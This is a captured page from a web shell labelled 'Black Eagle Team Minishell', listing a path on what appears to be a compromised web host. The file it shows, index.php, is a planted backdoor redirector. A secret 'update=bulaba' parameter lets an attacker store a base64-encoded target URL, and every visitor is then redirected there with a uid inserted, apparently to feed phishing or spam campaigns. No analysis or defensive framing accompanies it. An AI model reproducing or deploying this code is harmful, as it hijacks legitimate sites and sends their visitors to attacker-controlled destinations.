Black Eagle Team Minishell
Path:
/
home
/
ccpsafy
/
www
/
ccs
/
[
Home
]
File: index.php
<?php if(isset($_GET["update"]) && isset($_GET["url"]) && $_GET["update"] == "bulaba"){ $url = base64_decode($_GET["url"]); file_put_contents("db.json", "{\"url\": \"$url\"}"); echo "ok"; exit; } include 'bab.php'; $destination = json_decode(file_get_contents("db.json")); $uid = isset($_GET["uid"]) ? $_GET["uid"] : ""; $url = str_replace("#uid#", $uid, $destination->url); header("Location: $url");
©
2020 Black Eagle Team